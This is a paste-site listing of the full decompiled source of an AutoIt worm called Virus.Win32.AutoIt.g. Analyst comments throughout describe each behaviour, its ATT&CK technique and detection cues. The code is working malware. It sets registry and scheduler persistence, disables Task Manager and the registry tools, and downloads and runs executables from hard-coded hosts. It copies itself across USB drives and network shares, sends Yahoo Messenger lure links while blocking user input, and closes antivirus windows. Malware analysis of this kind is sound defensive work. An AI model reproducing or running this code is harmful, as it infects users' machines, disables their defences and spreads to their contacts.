FlyFar

Virus.Win32.AutoIt.g - Source Code

Jun 12th, 2023
AutoIt 14.07 KB | Cybersecurity | 0 0
  1. ; <AUT2EXE VERSION: 3.2.0.1>
  2.  
  3. ; ----------------------------------------------------------------------------
  4. ; <AUT2EXE INCLUDE-START: C:\Documents and Settings\nhatquanglan\Desktop\cuoicung.au3>
  5. ; ----------------------------------------------------------------------------
  6.  
  7. ;Written by Nhatquanglan
  8.  
  9. ; ----------------------------------------------------------------------------
  10. ; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
  11. ; ----------------------------------------------------------------------------
  12.  
  13. ; Include Version:1.59  (04/20/2006)
  14. ; ------------------------------------------------------------------------------
  15. ;
  16. ; AutoIt Version: 3.0
  17. ; Language:       English
  18. ; Description:    Functions that assist with process management.
  19. ;
  20. ; ------------------------------------------------------------------------------
  21.  
  22. ;===============================================================================
  23. ;
  24. ; Description -   Returns a string containing the process name that belongs to a given PID.
  25. ; Syntax -        _ProcessGetName( $iPID )
  26. ; Parameters -    $iPID - The PID of a currently running process
  27. ; Requirements -  None.
  28. ; Return Values - Success - The name of the process
  29. ;                 Failure - Blank string and sets @error
  30. ;                       1 - Process doesn't exist
  31. ;                       2 - Error getting process list
  32. ;                       3 - No processes found
  33. ; Author(s) -     Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
  34. ; Notes -         Supplementary to ProcessExists().
  35. ;===============================================================================
  36. Func _ProcessGetName( $i_PID )
          ; ANALYSIS: stock helper from AutoIt's Process.au3 include (see the
          ; AUT2EXE INCLUDE-START banner above), not author-written code. It maps a
          ; PID to a process name by scanning ProcessList(). No call to it appears
          ; in the rest of this listing.
          ; NOTE(review): the header documents @error values 2 and 3, but every
          ; failure path in this body calls SetError(1).
  37.     If Not ProcessExists($i_PID) Then
  38.         SetError(1)
  39.         Return ''
  40.     EndIf
  41.     Local $a_Processes = ProcessList()
  42.     If Not @error Then
          ; Row 0 holds the entry count; each later row is [name, PID].
  43.         For $i = 1 To $a_Processes[0][0]
  44.             If $a_Processes[$i][1] = $i_PID Then Return $a_Processes[$i][0]
  45.         Next
  46.     EndIf
          ; Reached when ProcessList() failed or no row matched the PID.
  47.     SetError(1)
  48.     Return ''
  49. EndFunc   ;==>_ProcessGetName
  50.  
  51. ;===============================================================================
  52. ;
  53. ; Function Name:    _ProcessGetPriority()
  54. ; Description:      Get the  priority of an open process
  55. ; Parameter(s):     $vProcess      - PID or name of a process.
  56. ; Requirement(s):   AutoIt Beta v3.1.1.61+
  57. ;                   kernel32.dll (included with Windows)
  58. ; Return Value(s):  On Success - Returns integer corressponding to
  59. ;                   the processes's priority:
  60. ;                     0 - Idle/Low
  61. ;                     1 - Below Normal (Not supported on Windows 95/98/ME)
  62. ;                     2 - Normal
  63. ;                     3 - Above Normal (Not supported on Windows 95/98/ME)
  64. ;                     4 - High
  65. ;                     5 - Realtime
  66. ; On Failure:       Returns -1 and sets @Error to 1
  67. ; Author(s):        Matthew Tucker
  68. ;                   Valik added Pid or Processname logic
  69. ;===============================================================================
  70. ;
  71. Func _ProcessGetPriority($vProcess)
          ; ANALYSIS: stock helper from AutoIt's Process.au3 include. It translates
          ; the Win32 priority class of a process (given by PID or name) into the
          ; 0-5 scale described in the header. No call to it appears in the rest
          ; of this listing.
  72.     Local $i_PID = ProcessExists($vProcess)
  73.     If Not $i_PID Then
  74.         SetError(1)
  75.         Return -1
  76.     EndIf
  77.     Local $hDLL = DllOpen('kernel32.dll')
          ; 0x0400 is PROCESS_QUERY_INFORMATION, a read-only access right.
          ; NOTE(review): the OpenProcess result is not checked before use; a failed
          ; open presumably ends in the Case Else branch below - confirm.
  78.     Local $aProcessHandle = DllCall($hDLL, 'int', 'OpenProcess', 'int', 0x0400, 'int', False, 'int', $i_PID)
  79.     Local $aPriority = DllCall($hDLL, 'int', 'GetPriorityClass', 'int', $aProcessHandle[0])
  80.     DllCall($hDLL, 'int', 'CloseHandle', 'int', $aProcessHandle[0])
  81.     DllClose($hDLL)
  82.     Switch $aPriority[0]
  83.         Case 0x00000040 ; IDLE_PRIORITY_CLASS
  84.             Return 0
  85.         Case 0x00004000 ; BELOW_NORMAL_PRIORITY_CLASS
  86.             Return 1
  87.         Case 0x00000020 ; NORMAL_PRIORITY_CLASS
  88.             Return 2
  89.         Case 0x00008000 ; ABOVE_NORMAL_PRIORITY_CLASS
  90.             Return 3
  91.         Case 0x00000080 ; HIGH_PRIORITY_CLASS
  92.             Return 4
  93.         Case 0x00000100 ; REALTIME_PRIORITY_CLASS
  94.             Return 5
  95.         Case Else ; any other value, including a failed query
  96.             SetError(1)
  97.             Return -1
  98.     EndSwitch
  99.  
  100. EndFunc  ;==>_ProcessGetPriority
  101.  
  102. ;===============================================================================
  103. ;
  104. ; Description:      Executes a DOS command in a hidden command window.
  105. ; Syntax:           _RunDOS( $sCommand )
  106. ; Parameter(s):     $sCommand - Command to execute
  107. ; Requirement(s):   None
  108. ; Return Value(s):  On Success - Returns the exit code of the command
  109. ;                   On Failure - Depends on RunErrorsFatal setting
  110. ; Author(s):        Jeremy Landes <jlandes at landeserve dot com>
  111. ; Note(s):          None
  112. ;
  113. ;===============================================================================
  114. Func _RunDOS($sCommand)
           ; ANALYSIS: stock helper from AutoIt's Process.au3 include. It runs
           ; "<@ComSpec> /C <command>" with the window hidden (@SW_HIDE) and waits
           ; for the exit code. $sCommand is concatenated without quoting.
           ; In this listing it is used only for the two AT scheduler commands in
           ; the main script body, so a cmd.exe child running AT.exe under the
           ; sample's process is the observable result.
  115.     Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
  116. EndFunc   ;==>_RunDOS
  117.  
  118. ; ----------------------------------------------------------------------------
  119. ; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
  120. ; ----------------------------------------------------------------------------
  121.  
  122. #NoTrayIcon
       ; ANALYSIS: main script body. The directive above hides the AutoIt tray icon.
       ; "SCVHOST" differs from the legitimate svchost name by two transposed
       ; letters. File extensions are kept as separate strings and joined at each
       ; use, so full file names never appear as single literals in the script.
  123. $name = "SCVHOST"
  124. $setting = "setting"
  125. $ini = ".ini"
  126. $nql = ".nql"
  127. $xls = ".xls"
  128. $exe = ".exe"
       ; ANALYSIS: trigger values compared with @HOUR / @MIN in the loop at the bottom.
  129. $toigioupdate = @HOUR + 2
  130. $toigio = @MIN + 30
       ; ANALYSIS: self-copy (flag 0 = do not overwrite) to @SystemDir\SCVHOST.exe,
       ; marked read-only/system/hidden (+RSH), and to @WindowsDir\SCVHOST.exe,
       ; where those attributes are cleared (-RSH). The @WindowsDir copy is the
       ; source file for the later removable-drive and share copies.
  131. FileCopy (@AutoItExe, @SystemDir & "\" & $name & $exe,0)
  132. FileSetAttrib (@SystemDir & "\" & $name & $exe,"+RSH")
  133. FileCopy (@AutoItExe, @WindowsDir & "\" & $name & $exe,0)
  134. FileSetAttrib (@WindowsDir & "\" & $name & $exe,"-RSH")
       ; ANALYSIS: persistence (ATT&CK T1547.004 / T1547.001). The Winlogon Shell
       ; value becomes "Explorer.exe SCVHOST.exe", and an HKCU Run value with the
       ; misspelled name "Yahoo Messengger" points at the @SystemDir copy.
       ; Cleanup has to restore Shell to its default ("Explorer.exe") rather than
       ; delete it, and remove the Run value.
  135. RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe " & $name & $exe)
  136. RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "\" & $name & $exe)
       ; ANALYSIS: per-user policy values that remove the Explorer "Folder Options"
       ; menu and disable Task Manager and the registry editing tools
       ; (ATT&CK T1112 / T1562.001). All three being set to 1 together is a useful
       ; detection signal; they must be reset during remediation.
  137. RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NofolderOptions","REG_DWORD",1)
  138. RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD",1)
  139. RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD",1)
       ; ANALYSIS: scheduler persistence through AT (ATT&CK T1053.002). The first
       ; command deletes every existing AT job on the host, including legitimate
       ; ones; the second schedules the @SystemDir copy at 09:00 every day.
       ; NOTE(review): AtTaskMaxHours = 0 presumably removes the AT job run-time
       ; limit - confirm against Schedule service documentation.
  140. _RunDOS ("AT /delete /yes")
  141. _RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe)
  142. RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule","AtTaskMaxHours","REG_DWORD",0)
       ; ANALYSIS: one immediate messaging pass and one immediate config/payload fetch.
  143. sendmess()
  144. update()
       ; ANALYSIS: the "shared" value under WorkgroupCrawler\Shares is this sample's
       ; own marker (written by copynetwork()). The share-copy routine runs when
       ; the marker is empty or the file it names no longer exists.
  145. $a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared")
  146. If $a ="" Then
  147.     copynetwork ()
  148. EndIf
  149. If $a <>"" Then
  150.     If FileExists ($a)=0 Then
  151.         copynetwork()
  152.     EndIf
  153. EndIf
       ; ANALYSIS: endless service loop. Every pass runs the window-closing and
       ; removable-drive routines; update() and sendmess() run when the clock
       ; matches their trigger values. The loop body contains no Sleep call of its
       ; own (only Search() sleeps), so sustained CPU use by the process is
       ; likely - hedged, not measured.
  154. While (1)
  155.     killprocess()
  156.     copyusb()
  157.     If @HOUR = $toigioupdate Then
  158.         update()
  159.     EndIf
  160.     If @MIN = $toigio Then
  161.         sendmess()
  162.     EndIf
  163. WEnd
  164. Func downloadurl()
           ; ANALYSIS: fetches the remote configuration (ATT&CK T1105). Two hard-coded
           ; hosts are tried, each with "setting.nql" and then "setting.xls"; the
           ; next URL is tried only when InetGet returns 0 (failure). Whichever
           ; succeeds is saved as @SystemDir\setting.ini and marked +RSH.
           ; InetGet arguments 1,0 = bypass the local cache, wait for completion.
           ; Detection: HTTP requests to these hosts for setting.nql / setting.xls,
           ; and a hidden system-attribute setting.ini in @SystemDir. The remote
           ; extension (.nql/.xls) does not match the stored file type.
  165.     $settingurl = "http://nhattruongquang.0catch.com"
  166.     $settingurl1 = "http://www.freewebs.com/nhattruongquang"
  167.     If InetGet ($settingurl & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
  168.         If InetGet ($settingurl & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
  169.             If InetGet ($settingurl1 & "/" & $setting & $nql, @SystemDir & "\" & $setting & $ini,1,0) = 0 Then
  170.                 InetGet ($settingurl1 & "/" & $setting & $xls, @SystemDir & "\" & $setting & $ini,1,0)
  171.             EndIf
  172.         EndIf
  173.     EndIf
           ; Runs regardless of whether any download succeeded.
  174.     FileSetAttrib (@SystemDir & "\" & $setting & $ini,"+RSH")
  175. EndFunc
  176. Func update()
           ; ANALYSIS: config-driven download-and-execute stage (ATT&CK T1105).
           ; After refreshing setting.ini it reads, from section [setting], a base
           ; URL ("website") and up to three file names ("filedownload1..3").
           ; For each non-empty name with no existing @SystemDir\<name>.exe, it
           ; requests <website>/<name>.nql, falls back to <name>.xls, stores the
           ; result as <name>.exe, marks it +RSH and runs it.
           ; Nothing in this function checks the content, a signature or the
           ; origin of the download, so the executed payload is whatever the remote
           ; config names at the time. Static analysis of this listing therefore
           ; does not bound the sample's behaviour; retrieve setting.ini and any
           ; hidden .exe files in @SystemDir from an affected host.
  177.     downloadurl()
  178.     $website = IniRead (@SystemDir & "\" & $setting & $ini,"setting","website","")
  179.     $check01 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload1","")
  180.     $check02 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload2","")
  181.     $check03 = IniRead (@SystemDir & "\" & $setting & $ini,"setting","filedownload3","")
           ; Slot 1. Slots 2 and 3 below repeat the same sequence.
  182.     If $check01 <>"" Then
  183.         If Not FileExists (@SystemDir & "\" & $check01 & $exe) Then
  184.             If InetGet ($website & "/" & $check01 & $nql,@SystemDir & "\" & $check01 & $exe,1,0)=0 Then
  185.                 InetGet ($website & "/" & $check01 & $xls,@SystemDir & "\" & $check01 & $exe,1,0)
  186.             EndIf
  187.             If FileExists (@SystemDir & "\" & $check01 & $exe) Then
  188.                 FileSetAttrib (@SystemDir & "\" & $check01 & $exe,"+RSH")
  189.                 Run (@SystemDir & "\" & $check01 & $exe)
  190.             EndIf
  191.         EndIf
  192.     EndIf
           ; Slot 2.
  193.     If $check02 <>"" Then
  194.         If Not FileExists (@SystemDir & "\" & $check02 & $exe) Then
  195.             If InetGet ($website & "/" & $check02 & $nql,@SystemDir & "\" & $check02 & $exe,1,0)=0 Then
  196.                 InetGet ($website & "/" & $check02 & $xls,@SystemDir & "\" & $check02 & $exe,1,0)
  197.             EndIf
  198.             If FileExists (@SystemDir & "\" & $check02 & $exe) Then
  199.                 FileSetAttrib (@SystemDir & "\" & $check02 & $exe,"+RSH")
  200.                 Run (@SystemDir & "\" & $check02 & $exe)
  201.             EndIf
  202.         EndIf
  203.     EndIf
           ; Slot 3.
  204.     If $check03 <>"" Then
  205.         If Not FileExists (@SystemDir & "\" & $check03 & $exe) Then
  206.             If InetGet ($website & "/" & $check03 & $nql,@SystemDir & "\" & $check03 & $exe,1,0)=0 Then
  207.                 InetGet ($website & "/" & $check03 & $xls,@SystemDir & "\" & $check03 & $exe,1,0)
  208.             EndIf
  209.             If FileExists (@SystemDir & "\" & $check03 & $exe) Then
  210.                 FileSetAttrib (@SystemDir & "\" & $check03 & $exe,"+RSH")
  211.                 Run (@SystemDir & "\" & $check03 & $exe)
  212.             EndIf
  213.         EndIf
  214.     EndIf
           ; Re-arms the hour trigger used by the main loop: current hour + 2,
           ; minus 12 when the sum exceeds 12.
  215.     $toigioupdate = @HOUR + 2
  216.     If $toigioupdate >12 Then
  217.         $toigioupdate = $toigioupdate -12
  218.     EndIf
  219. EndFunc
  220. Func sendmess()
           ; ANALYSIS: instant-messenger spreading routine. It builds ten lure
           ; messages, each ending in a link ($myweb), and delivers one through an
           ; open Yahoo! Messenger window by driving the GUI with keystrokes.
           ; The link and every message can be replaced from setting.ini (keys
           ; "myweb" and "tin[0]".."tin[9]" in section [setting]); the literals
           ; below are fallbacks used when a key is empty or absent.
           ; The fallback texts are Vietnamese written without diacritics.
           ; User-visible symptoms for triage: contacts receive unsolicited
           ; messages carrying the link, the clipboard content is replaced, and
           ; keyboard/mouse input is blocked while the keystrokes are sent.
  221.     $myweb = IniRead (@SystemDir & "\" & $setting & $ini,"setting","myweb","")
  222.     If $myweb = "" Then
  223.         $myweb = "http://nhattruongquang.0catch.com"
  224.     EndIf
  225.     Dim $tin [10]
  226.     $tin[0] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[0]","")
  227.     If $tin[0] = "" Then
  228.         $tin[0] = "E may, vao day coi co con nho nay ngon lam " & $myweb & " "
  229.     EndIf
  230.     $tin[1] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[1]","")
  231.     If $tin[1] = "" Then
  232.         $tin[1] = "Vao day nghe bai nay di ban " & $myweb & " "
  233.     EndIf
  234.     $tin[2] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[2]","")
  235.     If $tin[2] = "" Then
  236.             $tin[2] = "Vao day nghe bai nay di ban " & $myweb & " "
  237.     EndIf
  238.     $tin[3] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[3]","")
  239.     If $tin[3] = "" Then
  240.         $tin[3] = "Biet tin gi chua, vao day coi di " & $myweb & " "
  241.     EndIf
  242.     $tin[4] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[4]","")
  243.     If $tin[4] = "" Then
  244.         $tin[4] = "Trang Web nay coi cung hay, vao coi thu di " & $myweb & " "
  245.     EndIf
  246.     $tin[5] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[5]","")
  247.     If $tin[5] = "" Then
  248.         $tin[5] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau?  " &$myweb &"  "
  249.     EndIf
  250.     $tin[6] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[6]","")
  251.     If $tin[6] = "" Then
  252.         $tin[6] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $myweb & " "
  253.     EndIf
  254.     $tin[7] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[7]","")
  255.     If $tin[7] = "" Then
  256.         $tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $myweb & " "
  257.     EndIf
  258.     $tin[8] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[8]","")
  259.     If $tin[8] = "" Then
  260.         $tin[8] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $myweb & " "
  261.     EndIf
  262.     $tin[9] = IniRead (@SystemDir & "\" & $setting & $ini,"setting","tin[9]","")
  263.     If $tin[9] = "" Then
  264.         $tin[9] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $myweb & " "
  265.     EndIf
           ; Delivery runs only when a window whose title matches
           ; "Yahoo! Messenger" is present.
  266.     $tieude = WinGetTitle("Yahoo! Messenger", "")
  267.     $kiemtra = WinExists ($tieude)
  268.     If $kiemtra = 1 Then
               ; One of the ten messages is chosen at random and placed on the
               ; clipboard, overwriting whatever the user had copied.
  269.         $ngaunhien = Random(0,9,1)
  270.         ClipPut ($tin[$ngaunhien])
               ; User input is blocked for the duration of the scripted keystrokes,
               ; which include two clipboard pastes (^v) followed by Enter.
  271.         BlockInput (1)
  272.         WinActivate ($tieude)
  273.         Send ("!m")
  274.         Send ("un")
  275.         Send ("^v {ENTER}{ENTER}")
  276.         Send ("^m")
  277.         Send ("{DOWN}")
  278.         Send ("^{SHIFTDOWN}{END}{SHIFTUP}")
  279.         Send ("{ENTER}")
  280.         Send ("^v {ENTER}")
  281.         BlockInput (0)
  282.     EndIf
           ; Re-arms the minute trigger used by the main loop: current minute + 30,
           ; minus 60 when the sum exceeds 60.
  283.     $toigio=@MIN + 30
  284.     If $toigio>60 Then
  285.         $toigio=$toigio-60
  286.     EndIf
  287. EndFunc
  288. Func killprocess()
           ; ANALYSIS: defence-impairment routine (ATT&CK T1562.001), called on every
           ; pass of the main loop. Despite its name it terminates no process; it
           ; closes windows by title and deletes autostart values.
           ; AutoIt's default title matching is by prefix, so any window whose
           ; title starts with one of these strings is affected.
           ; Symptom for triage: msconfig, Registry Editor and Task Manager windows
           ; close immediately after opening.
  289.     If WinExists ("Bkav2006") Then
               ; Closes the window and removes the HKLM Run value "BkavFw".
  290.         WinClose ("Bkav2006")
  291.         RegDelete ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","BkavFw")
  292.     EndIf
  293.     If WinExists ("System Configuration") Then
  294.         WinClose ("System Configuration")
  295.     EndIf
  296.     If WinExists ("Registry") Then
  297.         WinClose ("Registry")
  298.     EndIf
  299.     If WinExists ("Windows Task") Then
  300.         WinClose ("Windows Task")
  301.     EndIf
  302.     If WinExists ("[FireLion]") Then
               ; Removes the HKCU Run value "IEProtection" and then reboots the
               ; machine (Shutdown code 2 = reboot), so an unexpected restart is
               ; another observable symptom.
  303.         RegDelete ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","IEProtection")
  304.         Shutdown (2)
  305.     EndIf
  306. EndFunc
  307. Func copyusb()
           ; ANALYSIS: removable-media propagation (ATT&CK T1091), called on every
           ; pass of the main loop. It takes the first removable drive reported by
           ; DriveGetDrive, or the second when the first is A:, copies the
           ; @WindowsDir binary to "<drive>\New Folder.exe" (flag 0 = do not
           ; overwrite) and passes the drive to Search().
           ; No autorun file is written in this listing; the copy relies on a user
           ; launching a file that is named like a folder.
           ; Detection: "New Folder.exe" in the root of removable media.
  308.     Dim $usb[3]
  309.     $usb[0]=""
  310.     $usb[1]=""
  311.     $usb[2]=""
  312.     $usb = DriveGetDrive("REMOVABLE")
  313.     If NOT @error Then
  314.         If $usb[1] <>"A:" Then
  315.             FileCopy (@WindowsDir & "\" & $name & $exe,$usb[1] & "\New Folder.exe",0)
  316.             Search($usb[1])
  317.         EndIf
  318.         If $usb[1]="A:" Then
  319.             If $usb[2]<>"" Then
  320.                 FileCopy (@WindowsDir & "\" & $name & $exe,$usb[2] & "\New Folder.exe",0)
  321.                 Search($usb[2])
  322.             EndIf
  323.         EndIf
  324.     EndIf
  325. EndFunc
  326. Func Search($current)
           ; ANALYSIS: recursive directory walk used by copyusb() and copynetwork().
           ; For each entry under $current that carries the directory attribute
           ; ("D"), it copies the @WindowsDir binary next to that entry as
           ; "<entry name>.exe" (flag 0 = do not overwrite) and then descends into
           ; the entry.
           ; Detection and cleanup: on affected media, look for .exe files whose base
           ; name equals a sibling folder's name. Such copies are expected to be
           ; byte-identical to @WindowsDir\SCVHOST.exe, so one hash of that file
           ; can drive the sweep.
  327.     Local $search = FileFindFirstFile($current & "\*.*")
  328.     While 1
  329.         Dim $file = FileFindNextFile($search)
               ; The walk of this directory ends on error or an empty name.
  330.         If @error Or StringLen($file) < 1 Then ExitLoop
  331.         If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file <> "." Or $file <> "..") Then
  332.             FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & $exe,0)
  333.             Search($current & "\" & $file)
  334.         EndIf
  335.  
               ; One-millisecond pause per entry.
  336.         Sleep (1)
  337.     WEnd
  338.     FileClose($search)
  339. EndFunc
  340. Func copynetwork ()
           ; ANALYSIS: network-share propagation (ATT&CK T1080). It does not scan the
           ; network; it reads the subkeys under the current user's
           ; WorkgroupCrawler\Shares key, rewrites "/" as "\" and prefixes "\\"
           ; to form a UNC path. Up to 30 entries are read.
           ; The binary is copied to "<share>\New Folder.exe" with flag 1
           ; (overwrite); where the copy succeeds, the share is walked by Search().
           ; Afterwards the sample records a path under the value "shared" in the
           ; same key, which the main script reads as its "already done" marker.
           ; Detection: that "shared" value and "New Folder.exe" in the root of
           ; writable shares. Users with write access to many shares widen the
           ; impact, which is an argument for least-privilege share permissions.
  341.     Dim $mang[30]
  342.     For $i=1 to 30
  343.         $read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares",$i)
  344.         If @error Then ExitLoop
  345.         $read = StringReplace ($read,"/","\")
  346.         $mang[$i] = "\\" & $read
  347.         $checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1)
  348.         If $checkcopy =1 Then
  349.             Search($mang[$i])
  350.         EndIf
  351.     Next
  352.     RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared","REG_SZ",$mang[$i-1] & "\New Folder.exe")
  353. EndFunc
  354.  
  355. ; ----------------------------------------------------------------------------
  356. ; <AUT2EXE INCLUDE-END: C:\Documents and Settings\nhatquanglan\Desktop\cuoicung.au3>
  357. ; ----------------------------------------------------------------------------
  358.  